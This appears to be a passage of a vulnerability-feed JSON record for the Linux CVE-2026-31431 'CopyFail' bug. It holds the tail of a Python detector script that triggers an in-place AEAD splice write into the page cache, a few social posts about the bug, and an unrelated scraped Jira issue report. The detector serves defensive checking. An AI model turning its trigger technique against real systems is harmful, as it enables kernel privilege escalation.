b\"\\x00\" * 16),\n        (SOL_ALG, ALG_SET_AEAD_ASSOCLEN, struct.pack(\"I\", ASSOCLEN)),\n    ]\n    op.sendmsg([aad], cmsg, socket.MSG_MORE)\n\n    # Splice CRYPTLEN+TAGLEN bytes of the target's page-cache page into the\n    # op socket. Because algif_aead runs in-place (req->dst = req->src), those\n    # page-cache pages now sit in the destination scatterlist.\n    pr, pw = os.pipe()\n    try:\n        n = os.splice(fd_target, pw, CRYPTLEN + TAGLEN, offset_src=0)\n        if n != CRYPTLEN + TAGLEN:\n            raise RuntimeError(f\"splice file->pipe short: {n}\")\n        n = os.splice(pr, op.fileno(), n)\n        if n != CRYPTLEN + TAGLEN:\n            raise RuntimeError(f\"splice pipe->op short: {n}\")\n    except OSError as e:\n        os.close(pr); os.close(pw)\n        op.close(); master.close(); os.close(fd_target)\n        if e.errno in (errno.EOPNOTSUPP, errno.ENOTSUP):\n            raise RuntimeError(\n                \"splice into AF_ALG socket not supported on this kernel - \"\n                \"the page-cache attack vector is not reachable here\"\n            ) from e\n        raise\n\n    # Drive the algorithm. Auth check will fail (we sent zero ciphertext+tag);\n    # EBADMSG is fine - the scratch write fires before/independent of verify.\n    try:\n        op.recv(ASSOCLEN + CRYPTLEN + TAGLEN)\n    except OSError as e:\n        if e.errno not in (errno.EBADMSG, errno.EINVAL):\n            raise\n\n    op.close()\n    master.close()\n    os.close(pr)\n    os.close(pw)\n\n    # Read back via the existing fd (page cache, not disk).\n    os.lseek(fd_target, 0, os.SEEK_SET)\n    after = os.read(fd_target, PAGE)\n    os.close(fd_target)\n\n    return after, sentinel\n\n\ndef kernel_in_affected_line() -> bool:\n    # Per the disclosure, fixes landed on the 6.12, 6.17 and 6.18 stable lines.\n    rel = os.uname().release.split(\"-\")[0]\n    parts = rel.split(\".\")\n    try:\n        major, minor = int(parts[0]), int(parts[1])\n    except (ValueError, IndexError):\n        return False\n    return (major, minor) >= (6, 12)\n\n\ndef main() -> int:\n    print(f\"[*] CVE-2026-31431 detector  kernel={os.uname().release}  \"\n          f\"arch={os.uname().machine}\")\n    if not kernel_in_affected_line():\n        print(f\"[i] Kernel {os.uname().release} predates the affected \"\n              f\"6.12/6.17/6.18 lines; trigger may not apply even if \"\n              f\"prerequisites match.\")\n\n    reason = precheck()\n    if reason:\n        print(f\"[+] Precondition not met ({reason}). NOT vulnerable.\")\n        return 0\n    print(f\"[+] AF_ALG + {ALG_NAME!r} loadable - precondition met.\")\n\n    tmp = tempfile.mkdtemp(prefix=\"copyfail-\")\n    target = os.path.join(tmp, \"sentinel.bin\")\n    try:\n        after, sentinel = attempt_trigger(target)\n    except Exception as e:\n        print(f\"[!] Trigger failed: {type(e).__name__}: {e}\")\n        return 1\n    finally:\n        try:\n            os.remove(target)\n            os.rmdir(tmp)\n        except OSError:\n            pass\n\n    # The exact landing offset of the 4-byte scratch write depends on how\n    # the source/destination scatterlists are laid out by algif_aead for this\n    # combination of inline-AAD + spliced-page input. What's invariant is that\n    # the 4 bytes from AAD seqno_lo (our marker) appear somewhere in the page,\n    # AND the marker is not present in the original sentinel.\n    marker_off  = after.find(MARKER)\n    marker_orig = sentinel.find(MARKER)\n    diffs       = [i for i in range(PAGE) if after[i] != sentinel[i]]\n\n    if marker_off >= 0 and marker_orig < 0:\n        ctx = after[max(marker_off - 4, 0):marker_off + 12]\n        print(f\"[!] VULNERABLE to CVE-2026-31431.\")\n        print(f\"[!]   Marker {MARKER!r} (AAD seqno_lo) landed in the spliced \"\n              f\"page-cache page at offset {marker_off}.\")\n        print(f\"[!]   Surrounding bytes: {ctx.hex()}  ({ctx!r})\")\n        print(f\"[!] Apply the upstream fix or block algif_aead immediately.\")\n        return 2\n\n    if diffs:\n        first = diffs[0]\n        window = after[first:first + 16]\n        print(f\"[!] Page cache MODIFIED via in-place AEAD splice path \"\n              f\"({len(diffs)} bytes changed, first at offset {first}).\")\n        print(f\"[!]   Window: {window.hex()}\")\n        print(f\"[!]   The controllable scratch-write marker did not land, but \"\n              f\"the kernel still allowed a page-cache page into the writable \"\n              f\"AEAD destination scatterlist.\")\n        print(f\"[!]   Treat as VULNERABLE to the underlying bug class until \"\n              f\"a patched kernel is installed.\")\n        return 2\n\n    print(\"[+] Page cache intact. NOT vulnerable on this kernel.\")\n    return 0\n\n\nif __name__ == \"__main__\":\n    sys.exit(main())", "creation_timestamp": "2026-05-06T15:53:28.000000Z"}, {"uuid": "19f5a1cd-54da-4efc-8bf6-c7184a938de0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://infosec.exchange/users/technadu/statuses/116528712933814184", "content": "CISA warns: CopyFail Linux vuln exploited.\u2022 Privilege escalation \u2192 root\u2022 Impacts major distros\u2022 Patch deadline May 15\nhttps://www.technadu.com/cisa-warns-of-severe-copyfail-linux-vulnerability-under-active-exploitation-cve-2026-31431/627365/\nAre you patched?#InfoSec #Linux #CyberSecurity", "creation_timestamp": "2026-05-06T17:04:12.756967Z"}, {"uuid": "9f575a6f-0185-43e5-8a71-6a1179142a9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/83095", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a StarxSky\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-06 16:57:43\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\"Copy Fail\" \n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-06T17:00:05.000000Z"}, {"uuid": "6cb638ae-b23b-4b59-aaed-41eb5a6f1211", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/newsyc200.bsky.social/post/3ml7fcqcilc2m", "content": "CVE-2026-31431: Copy Fail vs. rootless containers https://www.dragonsreach.it/2026/05/04/cve-2026-31431-copy-fail-rootless-containers/ (http://news.ycombinator.com/item?id=48017813)", "creation_timestamp": "2026-05-06T19:03:24.449786Z"}, {"uuid": "a8485898-022c-4f2b-8fd4-33a1e31734f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/ef-edulog/3b5bccc17b7e14b046e06c7692b3a1de", "content": "\n\n\n\n\nJira Report \u2014 DO / IM / S2\n\n  :root {\n    --bg: #fff; --bg2: #f5f4ef; --bg3: #ebebeb;\n    --tx: #1a1a1a; --tx2: #666660; --tx3: #999994;\n    --info: #185FA5; --bdr: rgba(0,0,0,0.12); --bdr2: rgba(0,0,0,0.22);\n    --r: 8px; --rl: 12px;\n    --font: -apple-system, BlinkMacSystemFont, 'Segoe UI', sans-serif;\n    --mono: 'SF Mono','Fira Code',monospace;\n  }\n  @media(prefers-color-scheme:dark){\n    :root{--bg:#1e1e1c;--bg2:#2a2a28;--bg3:#333330;--tx:#f0efe8;--tx2:#a8a79f;--tx3:#6e6e68;--info:#85B7EB;--bdr:rgba(255,255,255,0.1);--bdr2:rgba(255,255,255,0.18)}\n  }\n  *{box-sizing:border-box;margin:0;padding:0}\n  body{font-family:var(--font);background:var(--bg);color:var(--tx);padding:24px;max-width:1300px;margin:0 auto}\n  h1{font-size:18px;font-weight:500;margin-bottom:4px}\n  .sub{font-size:12px;color:var(--tx2);margin-bottom:20px}\n  .tabs{display:flex;gap:6px;margin-bottom:1.25rem;flex-wrap:wrap}\n  .tab{padding:5px 13px;border:0.5px solid var(--bdr2);border-radius:var(--r);font-size:13px;cursor:pointer;background:var(--bg);color:var(--tx2)}\n  .tab.active{background:var(--bg2);color:var(--tx);font-weight:500}\n  .tab:hover:not(.active){background:var(--bg2)}\n  .legend{display:flex;gap:14px;flex-wrap:wrap;margin-bottom:1rem;font-size:11px;color:var(--tx2);align-items:center}\n  .li{display:flex;align-items:center;gap:4px}\n  .ld{width:9px;height:9px;border-radius:2px}\n  .summary-grid{display:grid;grid-template-columns:repeat(3,minmax(0,1fr));gap:8px;margin-bottom:1.25rem}\n  .metric{background:var(--bg2);border-radius:var(--r);padding:10px 12px}\n  .ml{font-size:11px;color:var(--tx2);margin-bottom:3px}\n  .mv{font-size:20px;font-weight:500}\n  .project-block{margin-bottom:1.1rem;border:0.5px solid var(--bdr);border-radius:var(--rl);overflow:hidden}\n  .ph{padding:9px 14px;border-bottom:0.5px solid var(--bdr);display:flex;align-items:center;justify-content:space-between}\n  .pn{font-size:13px;font-weight:500}\n  .pm{font-size:11px;color:var(--tx2)}\n  .th{padding:5px 14px;font-size:11px;font-weight:500;color:var(--tx2);background:var(--bg2);display:flex;align-items:center;gap:6px;border-top:0.5px solid var(--bdr)}\n  .tc{background:var(--bg3);color:var(--tx2);padding:1px 6px;border-radius:var(--r);font-size:10px}\n  .cols{display:grid;grid-template-columns:80px 1fr 86px 82px 82px 80px 98px;gap:4px;padding:4px 14px;font-size:10px;color:var(--tx3);background:var(--bg2);border-top:0.5px solid var(--bdr)}\n  .ir{display:grid;grid-template-columns:80px 1fr 86px 82px 82px 80px 98px;gap:4px;padding:6px 14px;align-items:start;border-top:0.5px solid var(--bdr);font-size:11px}\n  .ir.stale{background:rgba(250,238,218,0.3)}\n  .ir.highest{background:rgba(252,235,235,0.35)}\n  .ir.overdue{background:rgba(252,235,235,0.45)}\n  .ir.stale.highest,.ir.stale.overdue{background:rgba(250,220,200,0.45)}\n  @media(prefers-color-scheme:dark){\n    .ir.stale{background:rgba(99,56,6,0.2)}.ir.highest{background:rgba(121,31,31,0.2)}\n    .ir.overdue{background:rgba(121,31,31,0.3)}.ir.stale.highest,.ir.stale.overdue{background:rgba(110,40,6,0.28)}\n  }\n  .ik{color:var(--info);font-size:10px;font-family:var(--mono);white-space:nowrap;text-decoration:none}\n  .ik:hover{text-decoration:underline}\n  .is{color:var(--tx);line-height:1.4;overflow:hidden;display:-webkit-box;-webkit-line-clamp:2;-webkit-box-orient:vertical}\n  .ia{color:var(--tx2);font-size:10px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}\n  .dt{font-size:10px;white-space:nowrap}\n  .upd-ok{color:var(--tx2)}.upd-stale{color:#BA7517;font-weight:500}\n  .due-ok{color:var(--tx2)}.due-over{color:#A32D2D;font-weight:500}\n  .cr{color:var(--tx2)}\n  @media(prefers-color-scheme:dark){.upd-stale{color:#FAC775}.due-over{color:#F7C1C1}}\n  .dot-h{display:inline-block;width:5px;height:5px;border-radius:50%;background:#E24B4A;margin-right:2px;vertical-align:middle}\n  .dot-s{display:inline-block;width:5px;height:5px;border-radius:50%;background:#EF9F27;margin-right:2px;vertical-align:middle}\n  .dot-d{display:inline-block;width:5px;height:5px;border-radius:50%;background:#D85A30;margin-right:2px;vertical-align:middle}\n  .sb{font-size:10px;padding:2px 6px;border-radius:var(--r);text-align:center;white-space:nowrap}\n  .s-ip{background:#FAEEDA;color:#854F0B}.s-td{background:#E1F5EE;color:#0F6E56}\n  .s-oi{background:#FCEBEB;color:#A32D2D}.s-xx{background:var(--bg2);color:var(--tx2)}\n  @media(prefers-color-scheme:dark){\n    .s-ip{background:#633806;color:#FAC775}.s-td{background:#085041;color:#9FE1CB}.s-oi{background:#791F1F;color:#F7C1C1}\n  }\n  .empty{padding:16px;text-align:center;color:var(--tx3);font-size:12px}\n  .footer{font-size:11px;color:var(--tx3);margin-top:24px}\n\n\n\n\nJira Active Issues Report \u2014 DO / IM / S2\n\nGenerated May 06, 2026 at 10:12 PM  \u00b7  Excludes Done, Fixed, Canceled, Deferred  \u00b7  https://karrostech.atlassian.net\n\nLast 24 hrs24\u201348 hrs ago2\u20137 days agoOlder than 7 days\n\n\n  Highest priority\n  Stale \u22655 business days\n  Due date missed\n\n\n\n\n\nDO \u2014 Edulog DevOps\n2\n\nIM \u2014 Incident Management\n0\n\nS2 \u2014 Soc-2 & Security\n0\n            \n\n              \n\n                DO \u2014 Edulog DevOps\n                2 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nStory 2\n                    \n\n                      DO-2051\n                      Aldine, TX - Backup data and then copy to summer site\n                      \u2014\n                      May 6, '26\n                      May 6, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2049\n                      San Bernardino, CA - Please set up summer school ASDI \n                      Cory Emlen\n                      May 6, '26\n                      May 6, '26\n                      \u2014\n                      Verification\n                    \n\n\n\nDO \u2014 Edulog DevOps\n3\n\nIM \u2014 Incident Management\n5\n\nS2 \u2014 Soc-2 & Security\n0\n            \n\n              \n\n                DO \u2014 Edulog DevOps\n                3 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nTask 3\n                    \n\n                      DO-2042\n                      Client Cancelation for Kuna Joint School District, ID - May 29 shutdown\n                      Vader\n                      May 5, '26\n                      May 6, '26\n                      \u2014\n                      On hold\n                    \n                    \n\n                      DO-2041\n                      Remove the test server - fr-routing-legacy-test  it is no longer needed.\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2040\n                      Remove queuedNotification lambda function when associated NotificationService changes are deployed\n                      \u2014\n                      May 4, '26\n                      May 4, '26\n                      \u2014\n                      Backlog\n                    \n            \n\n              \n\n                IM \u2014 Incident Management\n                5 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nStory 4\n                    \n\n                      IM-7574\n                      Gwinnett, GA - Missing Data in Telematics\n                      Josiah Brown\n                      May 5, '26\n                      May 6, '26\n                      \u2014\n                      WORK IN PROGRESS\n                    \n                    \n\n                      IM-7573\n                      Brunswick County, NC - APP Issues\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7571\n                      Cleveland, OH - Client Reported Delays in Both Telematics and with Parent Portal Messages this Morning\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7569\n                      Zonar - Delay / Omission of pings to SM, PP\n                      Nick Sundberg\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Open Issue\n                    \nTask 1\n                    \n\n                      IM-7572\n                      Framingham Public Schools, GPS units not reporting in since 11:30 AM today\n                      Nick Sundberg\n                      May 5, '26\n                      May 6, '26\n                      \u2014\n                      Open Issue\n                    \n\n\n\nDO \u2014 Edulog DevOps\n8\n\nIM \u2014 Incident Management\n13\n\nS2 \u2014 Soc-2 & Security\n0\n            \n\n              \n\n                DO \u2014 Edulog DevOps\n                8 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nBug 2\n                    \n\n                      DO-2034\n                      DP V2 (build 180/AV1): EDP gateway /v4.0/vehicles/search returns 0 vehicles for development-test-school tenant\n                      \u2014\n                      May 3, '26\n                      May 3, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2033\n                      DP V2 (build 180/AV1): POST /apilive/setting/event/add returns 500 after login (tenantId='', deviceId=0)\n                      \u2014\n                      May 3, '26\n                      May 3, '26\n                      \u2014\n                      Backlog\n                    \nStory 1\n                    \n\n                      DO-2025\n                      Birdville, TX - Please deploy Telematics\n                      Cory Emlen\n                      Apr 29, '26\n                      May 6, '26\n                      \u2014\n                      IN PROGRESS\n                    \nTask 5\n                    \n\n                      DO-2037\n                      Deploy Hafeez's Data Build Tool\n                      Boluwatife Olaifa\n                      May 4, '26\n                      May 6, '26\n                      May 4, '26\n                      Backlog\n                    \n                    \n\n                      DO-2032\n                      Need script run on Cobb to remove duplicate locations\n                      Vader\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-2028\n                      All legacy PP ingestions have not run:\n                      Josiah Brown\n                      May 1, '26\n                      May 6, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2027\n                      Patch infra with CopyFail (CVE-2026-31431)\n                      Josiah Brown\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2026\n                      Johnston NC Demo Site down\n                      Vader\n                      Apr 30, '26\n                      May 6, '26\n                      \u2014\n                      Verification\n                    \n            \n\n              \n\n                IM \u2014 Incident Management\n                13 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nStory 13\n                    \n\n                      IM-7567\n                      Fayette County, no bus event update since 4/29\n                      \u2014\n                      May 1, '26\n                      May 6, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7564\n                      Knox, TN - Gps units not reporting in since yesterday\n                      \u2014\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7563\n                       West Shore - Parent Portal not working\n                      Brandon Donnelson\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7561\n                      Denton, TX - Parent Portal App is not tracking buses\n                      Brandon Donnelson\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7560\n                      Suffolk, call from parent experiencing tracking issues.\n                      Josiah Brown\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7559\n                      New Kent, parent portal not tracking\n                      Brandon Donnelson\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7557\n                      New Hanover, Parent portal  tracking issues\n                      Brandon Donnelson\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7556\n                      Jefferson, parent portal not tracking \n                      Josiah Brown\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7555\n                      Elyria-OH ,Parent Portal App don't track the bus.\n                      Josiah Brown\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7554\n                      Peoria, AZ - Parent Portal Down\n                      Brandon Donnelson\n                      Apr 30, '26\n                      Apr 30, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7553\n                      Stanfield, AZ's Parent Portal is not working as of this morning.  Last reading 4:16am.  \n                      \u2014\n                      Apr 30, '26\n                      May 6, '26\n                      \u2014\n                      Blocker\n                    \n                    \n\n                      IM-7551\n                      SM Can't Send Messages to PP/PPL\n                      Boluwatife Olaifa\n                      Apr 30, '26\n                      Apr 30, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7550\n                      Cleveland, OH - Not able to track buses - GPS tracking down\n                      Kehinde Metibemu\n                      Apr 30, '26\n                      Apr 30, '26\n                      \u2014\n                      Open Issue\n                    \n\n\n\nDO \u2014 Edulog DevOps\n50\n\nIM \u2014 Incident Management\n0\n\nS2 \u2014 Soc-2 & Security\n0\n            \n\n              \n\n                DO \u2014 Edulog DevOps\n                50 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nATH New site request 1\n                    \n\n                      DO-1787\n                      Elyria, OH - Athena Conversion from Legacy\n                      Cory Emlen\n                      Mar 17, '26\n                      Apr 30, '26\n                      Apr 17, '26\n                      Blocked\n                    \nBug 49\n                    \n\n                      DO-1905\n                      Parent Portal missing route/vehicle data after EKS 1.34 upgrade \u2014 missed cron sync + Hibernate 6 bug\n                      \u2014\n                      Apr 6, '26\n                      Apr 6, '26 (22d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1855\n                      There is no data available in Route assignment, Live substitution modules of Telematcis for Johnston site\n                      Mide Dickson\n                      Mar 26, '26\n                      Mar 26, '26 (29d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1854\n                      There is no data available in multiple pages like Students, Runs, Routes modules of Routing for Johnston site \n                      Mide Dickson\n                      Mar 26, '26\n                      Mar 26, '26 (29d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1842\n                      EDTA service missing MongoDB JVM args \u2014 broken on 57 production tenants\n                      \u2014\n                      Mar 25, '26\n                      Mar 25, '26 (30d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1801\n                      release-2-fr - Elastic search error displays into log - Unable to search for stop locations\n                      \u2014\n                      Mar 19, '26\n                      Mar 19, '26 (34d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1786\n                      [EastAllen, IN 1.78 Smoke]CA Result CSV \u2013 Export fails for valid dates with 400 Bad Request (invalid page number)\n                      Dane Elwood\n                      Mar 17, '26\n                      Mar 26, '26 (29d)\n                      \u2014\n                      Blocked\n                    \n                    \n\n                      DO-1785\n                      [EastAllen, IN 1.78 Smoke]Vehicles \u2013 Seating Configuration popup shows error \u201cnetwork issues\u201d due to backend API failure\n                      Josiah Brown\n                      Mar 17, '26\n                      Mar 17, '26 (36d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1784\n                      [Lake Superior 1.78 Smoke]Time & Attendance module not opening from main dashboard\n                      Josiah Brown\n                      Mar 17, '26\n                      Mar 17, '26 (36d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1783\n                      Config API is failing for Time & Attendance module in Collinsville site \n                      Josiah Brown\n                      Mar 17, '26\n                      Mar 17, '26 (36d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1782\n                      Several API calls are failed in ultilities --> Employee Import and Queue Priority modules \n                      Josiah Brown\n                      Mar 17, '26\n                      Mar 17, '26 (36d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1779\n                      [Cleveland -1.78] [Time & attendance][Absence Record] Data preview is not available\n                      Josiah Brown\n                      Mar 16, '26\n                      Mar 16, '26 (37d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1776\n                      Routes API CORS Blocked & Gateway Timeout on Routes Management Page\n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 15, '26 (38d)\n                      \u2014\n                      Verification\n                    \n                    \n\n                      DO-1775\n                      [Chicago-1.78] [Telematics --> Edulog standard reports] - Unable to select date range for AM on time report\n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 13, '26 (38d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1768\n                      [moorhead 1.78.0] [Telematics] [Vehicle Plan Error] Front end error for Vehicle on Route Historical view\n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 16, '26 (37d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1767\n                      500 Internal Server Error on Athena Routing Screen \u2013 eligibilities API\n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 23, '26 (32d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1766\n                      [Helena] API call fails on clicking \"Add New\" Student \n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 23, '26 (32d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1765\n                      Deleting a student without entering any data in Add student form is giving 405 error \n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 27, '26 (28d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1761\n                       is displayed against a checkbox on Custom transportation Needs \n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1760\n                      Pick A Location - External address return as the SA\" is failing because the \"Pick A Location\" button cannot be located on the page, preventing test execution.\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1759\n                      [Chief Leschi-1.78][Reports] [User defined Reports] Unable to create a new report template\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 31, '26 (26d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1758\n                      API returns 500 error when sending IN filter with empty values array in search request\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1757\n                      Stops/Checkpoints \u2013 Map not displayed in \u201cPick A Location\u201d popup when using Relocate\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1756\n                      [Chief Leschi-1.78] Created date is not same when downloaded a report\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 24, '26 (31d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1755\n                      Data Management \u2013 Map fails to load across multiple modules\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1754\n                      [Chief Leschi-1.78] Created by \"unknown\" appearing with CA Reports\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 24, '26 (31d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1753\n                      Students \u2013 Student picture API returning 404 Not Found when opening student record\n                      Josiah Brown\n                      Mar 12, '26\n                      Apr 6, '26 (22d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1752\n                      Students \u2013 Address parsing APIs (type, prefix, suffix) returning 500 Internal Server Error in background requests\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1751\n                      Students \u2013 Opening student record triggers \"Error parsing address\" popup and address standardization API returns 500\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1749\n                      Historical changes API is returning 500 Internal server error on Vehicle on routes in Telamatics\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 17, '26 (36d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1615\n                      Payroll Data is not available/displaying\n                      \u2014\n                      Mar 11, '26\n                      Mar 11, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1614\n                      Data is not Visible for Default Working Hours in Employees under Data Management\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1613\n                      UDF Tab is not Displayed in Employee Information Page\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1611\n                      RPO \u2013 OPT actions failure\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1610\n                      [Chief Leschi-1.78] Created by \"unknown\" appearing with Stops details\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 17, '26 (36d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1608\n                      Location search fails with 504 Gateway Timeout when adding a new Stop\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1606\n                      Student Needs dialogs shows formatting issues and invalid \u201c504\u201d need option\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1594\n                      [Foundations] 404 error on Students detail page\n                      Josiah Brown\n                      Mar 10, '26\n                      Mar 10, '26 (41d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1591\n                      Web Query not configured for aldine-tx\n                      Josiah Brown\n                      Mar 10, '26\n                      Mar 10, '26 (41d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1579\n                      [Support][1.78] [Telematics] -- Error on FE Live Subs\n                      Josiah Brown\n                      Mar 9, '26\n                      Mar 9, '26 (42d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1578\n                      [Support-Site-1.78] 500 internal server error for \"eligibilities\"call\n                      Josiah Brown\n                      Mar 9, '26\n                      Mar 10, '26 (41d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1577\n                      [Training][1.78] [Telematics-Drivers] -- Error on FE for Route Assignment\n                      Josiah Brown\n                      Mar 9, '26\n                      Mar 30, '26 (27d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1575\n                      [Manitouspring][1.78] [Telematics-Drivers] -- Error on FE for Route Assignment\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 9, '26 (42d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1572\n                      [Manitouspring][1.78] Audit Logs: Unknown has been shown for many logs in users column\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 17, '26 (36d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1570\n                      500 err on cancel report API\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 6, '26 (43d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1569\n                      API Timesout - Endless Spinning 